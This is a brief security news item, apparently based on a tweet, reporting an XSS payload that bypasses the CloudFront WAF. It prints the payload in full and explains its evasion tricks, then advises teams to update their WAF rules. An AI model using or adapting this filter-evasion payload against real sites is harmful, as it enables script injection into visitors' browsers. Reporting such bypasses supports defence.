A new bypass technique for Cloudfront WAF has been discovered for XSS vulnerabilities. The payload used for bypassing is <svg/onload=window["al"+"ert"]`1337`>. To evade detection, the payload manipulates the code by using various techniques like replacing spaces with / and encoding symbols. This bypass method allows attackers to execute malicious scripts on the target system, bypassing the WAF protection. Security teams should review their security policies and update their WAF rules to prevent such bypasses in the future.
Check out the original tweet here: https://twitter.com/mamunwhh/status/1929843472665923920